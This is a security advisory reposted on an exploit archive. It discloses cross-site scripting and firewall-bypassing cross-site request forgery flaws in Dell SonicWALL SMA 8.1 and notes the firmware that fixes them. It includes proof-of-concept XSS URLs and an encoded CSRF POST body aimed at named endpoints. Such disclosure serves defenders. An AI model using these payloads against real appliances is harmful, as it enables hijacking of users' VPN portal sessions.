exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dell SonicWALL Secure Mobile Access SMA 8.1 CSRF / XSS

Dell SonicWALL Secure Mobile Access SMA 8.1 CSRF / XSS
Posted Dec 30, 2016
Authored by LiquidWorm | Site zeroscience.mk

Dell SonicWALL Secure Mobile Access SMA version 8.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 9c6e1e62011dc14636b4f5849d5f84a87d42f3acec586620f4296ac473fb6a89

Dell SonicWALL Secure Mobile Access SMA 8.1 CSRF / XSS

Change Mirror Download
i>>?
Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF


Vendor: Dell Inc.
Product web page: https://www.sonicwall.com/products/secure-mobile-access/
Affected version: 8.1 (SSL-VPN)

Summary: Keep up with the demands of todayas remote workforce. Enable secure
mobile access to critical apps and data without compromising security. Choose
from a variety of scalable secure mobile access (SMA) appliances and intuitive
Mobile Connect apps to fit every size business and budget.

Desc: SonicWALL SMA suffers from a XSS issue due to a failure to properly sanitize
user-supplied input to several parameters. Attackers can exploit this weakness
to execute arbitrary HTML and script code in a user's browser session. The WAF was
bypassed via form-based CSRF.

Tested on: SonicWALL SSL-VPN Web Server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5392
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5392.php

Firmware fixed: 8.1.0.3
Issue ID: 172692
http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.3/release-notes/resolved-issues?ParentProduct=869



26.01.2016

--


Reflected XSS via protocol parameter (GET):
-------------------------------------------

https://127.0.0.1/cgi-bin/ftplauncher?protocol=sftp:</script><img%20src=a%20onerror=confirm(1)>&bmId=55


XSS via arbitrary parameter (GET):
----------------------------------

https://127.0.0.1/cgi-bin/handleWAFRedirect?hdl=VqjLncColvAAAF4QB2YAAAAT&<script>alert(2)</script>=zsl


XSS via REMOTEPATH parameter (GET):
-----------------------------------

https://127.0.0.1/cgi-bin/soniclauncher?REMOTEPATH=//servername/share/</script><img%20src=a%20onerror=confirm(3)>&bmId=59


WAF Cross-Site Request Forgery PoC:
-----------------------------------

POST /cgi-bin/editBookmark HTTP/1.1
Host: 127.0.0.1

bmName=%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2533%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e%250a&host=2&description=3&tabs=4&service=HTTP&screenSize=4&screenSizeHtml5=4&colorSize=3&macAddr=&wolTime=90&apppath=&folder=&appcmdline=&tsfarmserverlist=&langsel=1&redirectclipboard=on&displayconnectionbar=on&autoreconnection=on&bitmapcache=on&themes=on&rdpCompression=on&audiomode=3&rdpExperience=1&rdpServerAuthFailAction=2&charset=UTF-8&sshKeyFile=&defaultWindowSize=1&kexAlgoList=0%2C1%2C2&cipherAlgoList=&hmacAlgoList=&citrixWindowSize=1&citrixWindowWidth=0&citrixWindowHeight=0&citrixWindowPercentage=0&citrixLaunchMethod=Auto&forceInstalledCheckbox=on&icaAddr=&vncEncoding=0&vncCompression=0&vncCursorShapeUpdates=0&vncUseCopyrect=on&vncRestrictedColors=on&vncShareDesktop=on&MC_App=inherit&MC_Copy=inherit&MC_Print=inherit&MC_Offline=inherit&name=1%22+javascript%3Aconfirm(251)%3B&type=user&owner=zslab&cmd=edit&parentBmId=0&ownerdomain=ZSLAB&serviceManualConfigList=undefined&wantBmData=true&swcctn=1NcP8JhUY10emue9YQpON1p2c%3D6P0c9P&ok=OK
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    15 Files
  • 29
    Aug 29th
    41 Files
  • 30
    Aug 30th
    13 Files
  • 31
    Aug 31st
    467 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close